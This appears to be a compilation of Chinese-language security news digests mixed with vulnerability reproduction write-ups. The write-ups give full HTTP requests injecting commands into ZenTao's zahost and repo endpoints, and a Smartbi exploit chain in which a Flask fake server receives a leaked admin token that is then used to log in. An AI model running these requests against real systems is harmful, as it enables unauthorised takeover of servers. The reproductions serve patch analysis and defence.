1、研究人员披露向非营利基金会捐款为诱饵的BEC活动 https://blog.cluster25.duskrise.com/2023/08/25/the-fraud-gala-bec 企业在全球范围内开展业务，以光速交换信息、开展合作和进行金融交易，所有这一切都通过电子邮件来实现。正是这种便利性为网络犯罪分子利用人类的弱点和操纵数字通信中固有的信任铺平了道路。这种欺骗现象被称为 "商业电子邮件破坏（BEC）"骗局，它已成为各种规模的企业都极为关注的威胁。研究人员发现了一起以向一些非营利基金会捐款为诱饵的 BEC 活动。在所有分析的案例中，诈骗邮件都是发送给财务或会计团队的员工，CEO 的电子邮件地址为抄送地址。攻击者要求使用指定的银行账户向非 2、研究人员披露伪装成电子邮件验证器的恶意NPM软件包 https://blog.phylum.io/npm-emails-validator-package-malware/ 研究人员发现了一个发布到 npm 的可疑软件包，名为“ emails-helper ”。该软件包是涉及 Base64 编码和加密二进制文件的复杂攻击的一部分。该方案获取来自远程服务器上托管的 DNS TXT 记录的加密密钥。此外，从该远程服务器检索十六进制编码的 URL，然后传递到生成的二进制文件。最终结果是部署强大的渗透测试工具，例如 dnscat2、mettle和 Cobalt Strike Beacon。 3、与 FIN8 相关攻击者对 Citrix NetScaler 系统进行大规模攻击 https://securityaffairs.com/150028/hacking/fin8-citrix-netscaler.html Sophos X-Ops 正在跟踪一项持续的活动，该活动针对 Citrix NetScaler 系统，该活动由与FIN8组织 [ BleepingComputer、SOCRadar ] 相关的威胁行为者发起。黑客正在大规模利用远程代码执行（编号为CVE-2023-3519）的攻击活动。 4、新的“MMRat”Android 木马瞄准东南亚用户 https://www.securityweek.com/new-mmrat-android-trojan-targeting-users-in-southeast-asia/ 据趋势科技报道，一种新发现的针对东南亚用户的 Android 木马允许攻击者远程控制设备并进行银行欺诈。该恶意软件被称为 MMRat，自 6 月份开始活跃，它可以捕获用户输入并截取屏幕截图，并使用基于 Protobuf 的定制命令和控制 (C&C) 协议，从而提高了传输大量数据时的性能。 5、联合国报告称东南亚数十万人参与网络诈骗 https://www.securityweek.com/un-warns-hundreds-of-thousands-in-southeast-asia-roped-into-online-scams/ 联合国人权办公室表示，犯罪团伙迫使东南亚数十万人参与非法网络诈骗活动，包括虚假浪漫策略、虚假投资宣传和非法赌博计划。 6、欧盟《数字服务法》正式生效，严管假资讯和仇恨言论 https://www.secrss.com/articles/58211 该法强制企业更加积极地监督数字内容，避免用户看到假资讯和仇恨言论，违规企业恐面临全球年营收6%的高额罚款。 7、思科修复了NX-OS和FXOS软件中的3个高严重性DOS漏洞 https://securityaffairs.com/149906/security/cisco-nx-os-and-fxos-software-flaws.html 思科本周解决了其产品中的多个缺陷，包括NX-OS和FXOS软件中的三个严重缺陷。攻击者可利用这三个问题造成拒绝服务 （DoS） 条件。 8、研究人员发现 Azure 中存在URL接管漏洞 https://www.infosecurity-magazine.com/news/reply-url-takeover-issue-azure/ 攻击者可以使用该 URL 将授权代码重定向到自己，并以此交换访问令牌。然后，威胁者就可以通过中间层服务调用 Power Platform API，获得更高的权限。 9、黑客用30美元的设备，就让波兰铁路瘫痪了 https://securityaffairs.com/149952/hacking/hacking-attack-polan-railways.html 据《连线》报道，破坏者通过无线电频率向目标列车发出简单的所谓“无线电停止”命令。由于波兰铁路系统中使用的无线电系统缺乏加密或身份验证，因此很容易欺骗无线电停止命令。 10、ICO 呼吁社交媒体公司保护用户数据不被窃取 https://www.bleepingcomputer.com/news/security/ico-calls-on-social-media-firms-to-protect-users-data-from-scraping/ 英国信息专员办公室（ICO）与来自世界各地的11个数据保护和隐私机构一起发布了一份声明，呼吁社交媒体平台加强对数据抓取的保护。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、开源工具LaZagne可利用Pidgin D-Bus API窃取密码 https://unit42.paloaltonetworks.com/lazagne-leverages-d-bus/ 攻击者增加了对 Linux 系统的针对性攻击，开源密码恢复工具 LaZagne 等黑客工具实用程序的易于访问性使得攻击者易于在恶意软件攻击链中使用这种工具来转储密码。 2、Leaseweb提供商正在恢复因漏洞而禁用的关键系统 https://www.leasewebstatus.com/incidents/leaseweb-customer-portal-not-available/jrhktsaf 全球最大的云和托管提供商之一 Leaseweb 发布通知，称它正在努力恢复因最近的安全漏洞而禁用的“关键”系统。在周四发送给客户的电子邮件中，这家荷兰云提供商表示，周二晚上在调查客户门户停机问题时，发现其基础设施的某些部分存在“异常”活动的迹象。 3、Crates.io 上发现针对 Rust 开发人员的恶意软件攻击迹象 https://www.securityweek.com/signs-of-malware-attack-on-rust-developers-found-on-crates-io/ 据软件供应链安全公司 Phylum 称，Crates.io Rust 软件包仓库最近成为针对开发人员的恶意软件攻击的初始阶段的目标。 4、大规模的 MOVEIT 活动已经影响了至少 1,000 个组织和 6,000 万人 https://securityaffairs.com/149921/hacking/massive-moveit-campaign-campaign.html 网络安全公司 Emsisoft 分享了 Cl0p 勒索软件组织最近针对Progress Software Corporation 设计的MOVEit Transfer 文件传输平台进行的大规模黑客活动的细节。据专家称，这些攻击影响了大约 1,000 个组织和 60,144,069 个人。Cl0p 勒索软件团伙利用零日漏洞CVE-2023-34362入侵全球组织使用的平台并窃取其数据。 5、研究人员发布了针对 JUNIPER SRX 防火墙漏洞的 POC https://securityaffairs.com/149990/hacking/poc-exploit-juniper-srx-firewall-flaws.html watchTowr Labs 安全研究人员针对 Juniper SRX 防火墙中的漏洞发布了概念验证漏洞 (PoC)漏洞代码。未经身份验证的攻击者可以链接这些漏洞，以在易受攻击的设备上的 Juniper JunOS 中远程执行代码。 6、更新后的 KMSDX 僵尸网络瞄准 IOT 设备 https://securityaffairs.com/149970/cyber-crime/kmsdbot-botnet-new-version.html Akamai 安全情报响应团队 (SIRT) 发现了新版本的KmsdBot僵尸网络，该僵尸网络采用了针对物联网 (IoT) 设备的更新的 Kmsdx 二进制文件。KmsdBot 是一种基于 Golang 的规避恶意软件，Akamai 于 2022 年 11 月首次检测到，它通过使用弱登录凭据的 SSH 连接来感染系统。 7、Tor 调整 Onion 路由软件以抵御 DDoS 攻击 https://www.theregister.com/2023/08/26/tor_tweaks_onion_routing_software/ 更新后的软件现在支持名为 EquiX 的工作证明挑战。它由开发门罗币工作量证明算法的 Tevador 设计，是“一个 CPU 友好的客户端，具有快速验证和较小的解决方案大小（16 字节）”。 8、Telekopye为来自俄罗斯的大规模网络钓鱼诈骗提供支持 https://thehackernews.com/2023/08/new-telegram-bot-telekopye-powering.html 一项新的出于经济动机的行动正在利用恶意 Telegram 机器人来帮助威胁行为者欺骗受害者。该工具包被称为Telekopye，是Telegram和kopye的结合体。 9、补丁无效！CISA称梭子鱼ESG设备现仍无法抵御黑客攻击 https://www.bleepingcomputer.com/news/security/fbi-warns-of-patched-barracuda-esg-appliances-still-being-hacked/ 美国联邦调查局于近日警告称，梭子鱼电子邮件安全网关（ESG）的一个重要远程命令注入漏洞的补丁 "无效"，已打补丁的设备仍在不断受到攻击。 10、投放带木马链接，国内百万台电脑中招 https://www.secrss.com/articles/58236 近日，浙江杭州西湖网警在工作中发现，网上出现一些高仿即时办公通讯软件的“钓鱼网站”，其中携带木马病毒。短短数日，被木马病毒远程非法控制的电脑已达一百多万台。西湖网警立即开展调查，最终查明一个非法控制计算机信息系统的犯罪团伙。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

漏洞简介 禅道是第一款国产的开源项目管理软件。它集产品管理、项目管理、质量管理、文档管理、 组织管理和事务管理于一体，是一款专业的研发项目管理软件，完整地覆盖了项目管理的核心流程。 禅道管理思想注重实效，功能完备丰富，操作简洁高效，界面美观大方，搜索功能强大，统计报表丰富多样，软件架构合理，扩展灵活，有完善的 API 可以调用。 禅道后台存在 RCE 漏洞，存在于 V18.0-18.3 之间，经过复现分析，发现漏洞来源于新增加的一个功能模块。 环境搭建 源码下载地址 https://www.zentao.net/dl/zentao/18.2/ZenTaoPMS.18.2.php7.2_7.4.zip 利用 phpstudy 来进行环境的搭建 漏洞复现 登录后台后访问添加宿主机 在 ip 域名处 拼接恶意 payload 触发漏洞 POST /index.php?m=zahost&f=create HTTP/1.1 Host: test.test Content-Length: 131 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://test.test Referer: http://test.test/index.php?m=zahost&f=create Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: zentaosid=bp9k0pcftu49b2ethm9f32hc5b; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; moduleBrowseParam=0; productBrowseParam=0; executionTaskOrder=status%2Cid_desc; repoBranch=master; lastProduct=1; tab=qa; windowWidth=1440; windowHeight=722 Connection: close vsoft=kvm&hostType=physical&name=test2&extranet=127.0.0.1%7Ccalc.exe&cpuCores=2&memory=1&diskSize=1&desc=&uid=64e46f386d9ea&type=za 漏洞分析 这是禅道新增加的一个功能 增加新功能的同时也带来了新的风险点 module/zahost/control.php#create module/zahost/model.php#create module/zahost/model.php#checkAddress module/zahost/model.php#ping 整个漏洞触发流程在断点调试的过程中一目了然 POST /index.php?m=zahost&f=edit&hostID=1 HTTP/1.1 Host: test.test Content-Length: 131 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://test.test Referer: http://test.test/index.php?m=zahost&f=create Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: zentaosid=bp9k0pcftu49b2ethm9f32hc5b; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; moduleBrowseParam=0; productBrowseParam=0; executionTaskOrder=status%2Cid_desc; repoBranch=master; lastProduct=1; tab=qa; windowWidth=1440; windowHeight=722;XDEBUG_SESSION=PHPSTORM Connection: close vsoft=kvm&hostType=physical&name=test4&extranet=127.0.0.1%7Ccalc.exe&cpuCores=2&memory=1&diskSize=1&desc=&uid=64e46f386d9ea&type=za 这样也是可以触发的 model.php:119, zahostModel-\>ping() model.php:149, zahostModel-\>checkAddress() model.php:94, zahostModel-\>update() control.php:130, zahost-\>edit() router.class.php:2199, router-\>loadModule() index.php:74, {main}() 修复建议 更新至最新版本 执行命令时对地址进行了校验

1、Lazarus组织利用ManageEngine漏洞部署QuiteRAT https://blog.talosintelligence.com/lazarus-quiterat/ 研究人员发现了朝鲜国家资助的 Lazarus 组织目标是欧洲和美国的互联网基础设施和医疗保健实体。这是不到一年内该攻击者发起的第三次记录在案的活动，该攻击者在这些操作中重复使用了相同的基础设施。在此活动中，攻击者在该漏洞的 PoC 公开披露五天后开始利用 ManageEngine ServiceDesk 漏洞 ( CVE-2022-47966 )，以交付和部署跟踪为 QuiteRAT 的更新恶意软件威胁。安全研究人员在二月份首次发现了这个恶意程序。QuiteRAT 具有许多与 Lazar 2、Spacecolon工具集部署Scarab勒索软件的变体 https://www.welivesecurity.com/en/eset-research/scarabs-colon-izing-vulnerable-servers/ 研究人员介绍了 Spacecolon，这是一个小型工具集，用于向世界各地的受害者部署 Scarab 勒索软件的变体。它可能通过其操作员破坏易受攻击的 Web 服务器或通过暴力破解 RDP 凭据进入受害者组织。一些 Spacecolon 版本包含大量土耳其字符串，因此研究人员怀疑是一个讲土耳其语的开发商。Spacecolon 由三个 Delphi 组件组成——内部称为 HackTool、Installer 和 Servi 3、2023年上半年勒索软件黑客停留时间降至五天 https://news.sophos.com/en-us/2023/08/23/active-adversary-for-tech-leaders/ 在安全解决方案发出警报之前，勒索软件威胁攻击者在受感染的网络上花费的时间越来越少。上半年，黑客的中位停留时间从 2022 年的 9 天降至 5 天。网络安全公司研究人员的统计数据显示，今年上半年所有网络攻击的总体中位停留时间为 8 天，低于 2022 年的 10 天。研究人员观察到 43.42% 的案例中发生了数据泄露，比去年增加了 1.3%。大多数勒索软件事件发生在周五和周六，此时公司反应最慢，因为联系技术团队更加困难。最被滥用的工具之一仍 4、Jupiter X Core插件存在漏洞可导致遭遇黑客劫持网站 https://patchstack.com/articles/critical-vulnerabilities-patched-in-jupiter-x-core-plugin/ Jupiter X Core（用于设置 WordPress 和 WooCommerce 网站的高级插件）的某些版本存在两个漏洞，允许劫持帐户并在未经身份验证的情况下上传文件。Jupiter X Core 是一款易于使用且功能强大的可视化编辑器，是 Jupiter X 主题的一部分，已在超过172000 个网站中使用。第一个漏洞被识别为 CVE-2023-38388，允许在未经身份验证的情况下上传文件，这可能导致在 5、法国就业机构遭遇网络攻击导致1000万人敏感数据受影响 https://www.infosecurity-magazine.com/news/sensitive-data-10m-french/ 法国国家就业机构 Pole emploi 遭受网络攻击，可能泄露多达 1000 万人的关键信息。几位安全研究人员已将此漏洞与 Clop 勒索软件团伙的 MOVEit 活动联系起来，该活动已影响 977 个组织和近 5900 万人。在 2023 年 8 月 23 日发布的公开声明中，Pole emploi 确认其一家服务提供商的信息系统遭到破坏，存在泄露求职者个人数据的风险。该事件泄露了 2022 年 2 月在该机构登记的 600 万人的姓名、就业状况和社 6、NVIDIA显卡驱动程序中的漏洞可导致内存损坏和虚拟机逃逸 https://blog.talosintelligence.com/nvidia-graphics-driver-vulnerability-roundup/ 研究人员披露了与 NVIDIA 显卡配合使用的 NVIDIA D3D10 驱动程序的着色器功能中的三个漏洞。若攻击者发送特制的着色器打包程序，则驱动程序很容易受到内存损坏的影响，这可能会导致驱动程序中出现内存损坏问题。这三个漏洞（分别为TALOS-2023-1719 (CVE-2022-34671)、TALOS-2023-1720 (CVE-2022-34671) 和 TALOS-2023-1721 (CVE-2022-34671) 7、研究人员披露Redline窃取程序新变体 https://blog.eclecticiq.com/redline-stealer-variants-demonstrate-a-low-barrier-to-entry-threat 研究人员观察到Redline窃取程序的目标是用于立即获利的财务信息以及用于执行初始信息收集和建立持久性的侦察功能。RedLine 窃取程序几乎总是伴随着其他恶意软件：要么是先有加载程序来安装它，要么是进一步的恶意软件。在 2022 年 RedLine 窃取程序的最后一次主要迭代中，变体几乎总是配置为依赖漏洞利用工具包进行感染。在 2022 年的某个时候，随着开发人员重组，感染流量出现相对中断，但在 202 8、Rockwell ThinManager漏洞可导致工业设备的人机界面遭受网络攻击 https://www.securityweek.com/rockwell-thinmanager-vulnerabilities-could-expose-industrial-hmis-to-attacks/ 研究人员在罗克韦尔自动化的 ThinManager ThinServer 产品中发现的漏洞可用于针对工业控制系统 (ICS) 的攻击。 研究人员在 ThinManager ThinServer 中发现了一个严重漏洞和两个高严重性漏洞。这些缺陷被追踪为 CVE-2023-2914、CVE-2023-2915 和 CVE-2023-2917。这些安全漏洞为不正确的输入验证问题，可能导致 9、研究人员披露DarkGate恶意软件工具包新变体 https://www.malwarebytes.com/blog/threat-intelligence/2023/08/darkgate-reloaded-via-malvertising-campaigns 研究人员观察到一场恶意广告活动，该活动将潜在受害者引诱至 Windows IT 管理工具的欺诈网站。与之前的类似攻击不同，最终的有效负载的打包方式不同，并且无法立即识别。该诱饵文件作为 MSI 安装程序提供，其中包含 AutoIT 脚本，其中有效负载经过混淆以避免检测。研究人员分析得出该样本是 DarkGate 的更新版本，DarkGate 是 2018 年首次发现的多用途恶意软件 10、LockBit 3.0 勒索软件构建器泄露导致数百个新变种 https://thehackernews.com/2023/08/lockbit-30-ransomware-builder-leak.html 去年LockBit 3.0 勒索软件构建器的泄露导致威胁行为者滥用该工具产生新变种。卡巴斯基指出，它在遥测中总共检测到 396 个不同的 LockBit 样本，其中 312 个样本是使用泄露的构建器创建的。多达 77 个样本在勒索信中没有提及“LockBit”。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、Lazarus APT 利用 Zoho漏洞攻击互联网骨干基础设施提供商 https://securityaffairs.com/149829/apt/lazarus-apt-exploits-zoho-manageengine-flaw.html Lazarus 组织利用 Zoho ManageEngine ServiceDesk Plus 中的一个严重缺陷来传播 QuiteRAT 恶意软件。针对互联网骨干基础设施提供商和医疗保健组织发起攻击。 2、Lapsus$ 成员因参与攻击多家知名公司而被定罪 https://securityaffairs.com/149821/cyber-crime/lapsus-member-convicted.html Lapsus$数据勒索组织的一名青少年成员Arion Kurtaj（18 岁）被伦敦陪审团定罪，罪名是对Uber、Revolut等多家知名公司进行黑客攻击，并勒索游戏公司Rockstar Games的开发商。 3、研究人员发布了针对 Ivanti Sentry漏洞的 PoC 利用 https://securityaffairs.com/149837/breaking-news/poc-exploit-ivanti-sentry-cve-2023-38035.html 研究人员发布了针对关键 Ivanti Sentry 身份验证绕过漏洞CVE-2023-38035（CVSS 评分 9.8）的概念验证 (PoC) 代码。该漏洞可被利用来访问敏感的 API 数据和配置、运行系统命令或将文件写入系统。 4、思科修补了导致交换机、防火墙遭受 DoS 攻击的漏洞 https://www.securityweek.com/cisco-patches-vulnerabilities-exposing-switches-firewalls-to-dos-attacks/ 思科已针对 NX-OS 和 FXOS 软件中的三个高严重性漏洞发布了补丁，这些漏洞可能导致拒绝服务 (DoS) 情况。 5、研究人员披露将恶意Word文件嵌入PDF文件以逃避检测的方法 https://blogs.jpcert.or.jp/ja/2023/08/maldocinpdf.html 研究人员发现在 7 月份发生的攻击中使用了一种新技术，称为 PDF 中的 MalDoc，该技术将恶意 Word 文件嵌入到 PDF 文件中以逃避检测。研究人员详细披露了 PDF 中使用的 MalDoc 的详细情况以及对策。在 PDF 中使用 MalDoc 创建的文件具有 PDF 的文件结构，但可以在 Word 中打开。通过在 Word 中打开此文件，如果该文件设置了宏，VBS 将运行并表现出恶意行为。 6、Smoke Loader僵尸网络投放Whiffy Recon恶意软件 https://www.secureworks.com/blog/smoke-loader-drops-whiffy-recon-wi-fi-scanning-and-geolocation-malware 2023 年 8 月 8 日，研究人员观察到 Smoke Loader 僵尸网络向受感染的系统投放了自定义 Wi-Fi 扫描可执行文件。研究人员将此恶意软件命名为 Whiffy Recon。该恶意软件使用附近的 Wi-Fi 接入点作为 Google 地理定位 API 的数据点，对受感染系统的位置进行三角测量。 7、比利时社会服务中心遭受网络攻击被迫关闭 https://therecord.media/charleroi-belgium-cpas-cyberattack 比利时沙勒罗瓦的公共社会行动中心（CPAS）宣布，由于网络攻击，其社会分支机构将于周二关闭。CPAS 机构遍布全国 581 个城市，为当地社区提供社会服务，包括经济援助、住房、医疗和法律咨询。债务调解服务和 Energy House 服务也将因周一早上发现的攻击而关闭。虽然网络攻击并未直接破坏所有受影响的系统，但 IT 团队已决定将所有系统下线，作为安全预防措施。 8、针对苹果macOS 系统的信息窃取程序 XLoader 出现新变种 https://therecord.media/apple-macos-malware-xloader-infostealer 研究人员发现了 XLoader 恶意软件的新变种，该变种在试图从 macOS 设备窃取敏感信息时能够更好地躲避 苹果 的安全措施。 9、超过一半的浏览器扩展存在安全风险 https://www.darkreading.com/cloud/study-more-than-half-of-browser-extensions-pose-security-risks Spin.AI 对约 30万个浏览器扩展进行的风险评估显示，访问权限过于宽松，可能会执行潜在的恶意行为。 10、十多个恶意 npm 软件包瞄准 Roblox 游戏开发者 https://thehackernews.com/2023/08/over-dozen-malicious-npm-packages.html 自 2023 年 8 月开始，在 npm 软件包存储库中发现了十多个恶意软件包，这些软件包能够在 Roblox 开发人员的系统上部署名为Luna Token Grabber 的开源信息窃取程序。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

漏洞简介 禅道是第一款国产的开源项目管理软件。它集产品管理、项目管理、质量管理、文档管理、 组织管理和事务管理于一体，是一款专业的研发项目管理软件，完整地覆盖了项目管理的核心流程。 禅道管理思想注重实效，功能完备丰富，操作简洁高效，界面美观大方，搜索功能强大，统计报表丰富多样，软件架构合理，扩展灵活，有完善的 API 可以调用。 禅道后台存在 RCE 漏洞，均存在于历史版本，对这些漏洞进行复现分析。 环境搭建 源码下载地址 https://dl.cnezsoft.com/zentao/18.0.beta1/ZenTaoPMS.18.0.beta1.php7.2_7.4.zip 利用 phpstudy 来进行环境的搭建 ‍ 漏洞复现 登录后台创建 GitLab 类型的代码库 点击 DevOps 模块的设置选项，修改创建的代码库 点击保存并抓取数据包 修改参数 SCM 和 client SCM 修改为 Subversion client 修改为 calc | echo " 触发了命令执行，执行了两次 #### 漏洞分析 发现有一些分析文章中描述需要先创建一个代码仓库，也指出了创建代码仓库的原因，因为调用的是 edit 方法，所以要先 create 经过调试发现这是必须的，因为在没创建代码库时，执行 edit 方法，会提示跳转去创建代码库 module/repo/control.php#commonAction 所以需要先创建代码库 module/repo/control.php#create module/repo/model.php#create 在创建代码库的时候有一个检查 Client 的操作 只有选择 Gitlab 才能不做客户端的检测操作，直接创建成功 module/repo/model.php#checkClient 创建成功后执行编辑操作触发漏洞 POST /index.php?m=repo&f=edit&repoID=0 HTTP/1.1 Host: test.test Content-Length: 36 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://test.test Referer: http://test.test/index.php?m=repo&f=edit&repoID=1&objectID=0 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: zentaosid=bp9k0pcftu49b2ethm9f32hc5b; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; moduleBrowseParam=0; productBrowseParam=0; executionTaskOrder=status%2Cid_desc; windowWidth=1440; windowHeight=722; tab=devops; repoBranch=master;XDEBUG_SESSION=PHPSTORM Connection: close SCM=Subversion&client= calc | echo " module/repo/control.php#edit module/repo/model.php#update module/repo/model.php#checkConnection 修复建议 更新至最新版本 ‍

1、研究人员披露XLoader恶意软件新变体 https://www.sentinelone.com/blog/xloaders-latest-trick-new-macos-variant-disguised-as-signed-officenote-app/ XLoader 是一种长期运行的恶意软件即服务信息窃取程序和僵尸网络，自 2015 年以来一直活跃。其第一个 macOS 变体于 2021 年被发现，当时使用Java 程序分发。然而现在，研究人员发现 XLoader 近期的新变种，并且没有依赖项。XLoader 采用 C 和 Objective C 编程语言原生编写，并使用 Apple 开发人员签名，现在伪装成一款名为“Off 2、黑客论坛公开售卖260万Duolingo用户0数据 https://www.bleepingcomputer.com/news/security/scraped-data-of-26-million-duolingo-users-released-on-hacking-forum/ 黑客论坛上泄露了 260 万 DuoLingo 用户的抓取数。数据集昨天在新版 Breached 黑客论坛上发布，需要 8 个站点积分，价值仅为 2.13 美元。攻击者可以利用泄露的信息进行有针对性的网络钓鱼攻击。Duolingo 是世界上最大的语言学习网站之一，全球每月拥有超过 7400 万用户。2023 年 1 月，攻击者在现已关闭的 Breached 黑客论 3、 研究人员披露伪造的亚马逊谷歌广告 https://www.bleepingcomputer.com/news/security/sneaky-amazon-google-ad-leads-to-microsoft-support-scam Google 搜索结果中看似合法的亚马逊广告将访问者重定向到 Microsoft Defender 技术支持骗局，从而锁定了攻击者的浏览器。该恶意广告显示了亚马逊的合法网址，就像该公司的典型搜索结果一样。但是，点击 Google 广告会将用户重定向到一个技术支持骗局，该骗局冒充 Microsoft Defender 发出的警报，欺骗受害者感染了 ads(exe).finacetrack(2 4、美国司法部指控 Tornado Cash 创始人洗钱超过 10 亿美元 https://securityaffairs.com/149804/cyber-crime/tornado-cash-founders-charges.html 美国司法部指控两名男子经营 Tornado Cash 服务并洗钱超过 10 亿美元的犯罪所得。 5、FBI 称朝鲜 Lazarus 是近期加密货币盗窃案的幕后黑手 https://therecord.media/north-korea-lazarus-behind-crypto-heists FBI 将最近针对加密货币平台的三起网络攻击归咎于朝鲜政府的 APT38 黑客组织，该组织被许多研究人员称为Lazarus 或 TraderTraitor。 6、3,000 个 Openfire 服务器遭受针对近期漏洞的攻击 https://www.securityweek.com/3000-openfire-servers-exposed-to-attacks-targeting-recent-vulnerability 漏洞情报公司 VulnCheck 报告称，超过 3,000 台 Openfire 服务器尚未针对最近的漏洞进行修补，仍然容易受到新漏洞的攻击。 7、谷歌发布Chrome 116 安全更新，修复了五个内存安全漏洞 https://www.securityweek.com/first-weekly-chrome-security-update-patches-high-severity-vulnerabilities 谷歌本周宣布了 Chrome 116 安全更新，修复了外部研究人员报告的五个内存安全漏洞，其中包括四个被评为“高严重性”的问题。 8、乌克兰黑客声称泄露了俄罗斯议会副议长的电子邮件 https://therecord.media/ukrainian-hackers-claim-to-leak-emails-of-russia-duma-deputy 乌克兰黑客声称已侵入一名俄罗斯高级政治家的电子邮件账户，并曝光了据称证明他参与洗钱和逃避制裁计划的文件。 9、网络攻击迫使英国数百家零售商业务瘫痪 https://www.secrss.com/articles/57997 英国软件公司 Swan Retail 遭受网络攻击，导致超过 300 家英国商户无法处理付款或完成订单。 10、选民投票受阻？厄瓜多尔国家选举机构遭七国网络攻击 https://therecord.media/ecuador-election-cyberattacks-absentee-voting 厄瓜多尔举行的全国大选因居住在国外的公民难以通过网络投票而受到影响，此次影响的主要原因是因为厄瓜多尔选举机构遭遇了来自七个不同国家的网络攻击。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

2023年7月28日Smartbi官方修复了一处权限绕过漏洞。未经授权的攻击者可利用该漏洞，获取管理员token，完全接管管理员权限。 于是研究了下相关补丁并进行分析。 0x01分析结果 依据补丁分析，得到如下漏洞复现步骤 第一步，设置EngineAddress为攻击者机器上的http服务地址 首先使用python flask搭建一个fake server，上面只注册了/api/v1/configs/engine/smartbitoken接口，该接口返回一个json响应体 from flask import Flask,jsonify,request app = Flask(__name__) @app.route('/api/v1/configs/engine/smartbitoken',methods=["POST"]) def hello():    print(request.json)    return jsonify(hi="jello") if __name__ == "__main__":    app.run(host="0.0.0.0",port=8000) 使用如下poc，设置EngineAddress为我们的fake server地址http://10.52.32.43:8000， POST /smartbi/smartbix/api/monitor/setEngineAddress/ HTTP/1.1 Host: 127.0.0.1:18080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close Content-Length: 23 http://10.52.32.43:8000 第二步，触发smartbi向我们刚刚设置的EngineAddress外发token 发送如下请求 POST /smartbi//smartbix/api/monitor/token/ HTTP/1.1 Host: 127.0.0.1:18080 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close Content-Length: 10 experiment 发送相关请求后，即可在我们的fake server上面看到了携带token的请求 第三步，使用上面获取的token进行登录 POST /smartbi//smartbix/api/monitor/login/ HTTP/1.1 Host: 127.0.0.1:18080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close Content-Length: 47 admin_I8ac3b2d10189e80fe80fea750189ed0084f50082 返回true表示登录成功，其中的cookie就是合法的凭证 0x02分析过程 阅读相关补丁，可知此次漏洞与/smartbix/api/monitor/setServiceAddress有关 更进一步查看RejectSmartbixSetAddress类修补的方式，可知与smartbix.datamining.service.MonitorService类的getToken方法有关，该补丁表示如果系统中smartbix.datamining.service.MonitorService存在getToken方法就进行拦截/smartbix/api/monitor/setEngineAddress等一系列接口的请求。 分析smartbix.datamining.service.MonitorService类从头部的注解可知，该类下的所有路由都不需要认证即可访问 定位到getToken方法该方法对应的路由的/token,方法内部生成一个token，并在输入的type参数为experiment是将该token发送到系统配置中配置的ENGINE_ADDRESS 这意味着，只要ENGINE_ADDRESS可控，那么我们就能获取到一个合法的token 由补丁包的路由/smartbix/api/monitor/setServiceAddress定位到setEngineAddress方法可知该方法可以未授权配置ENGINE_ADDRESS 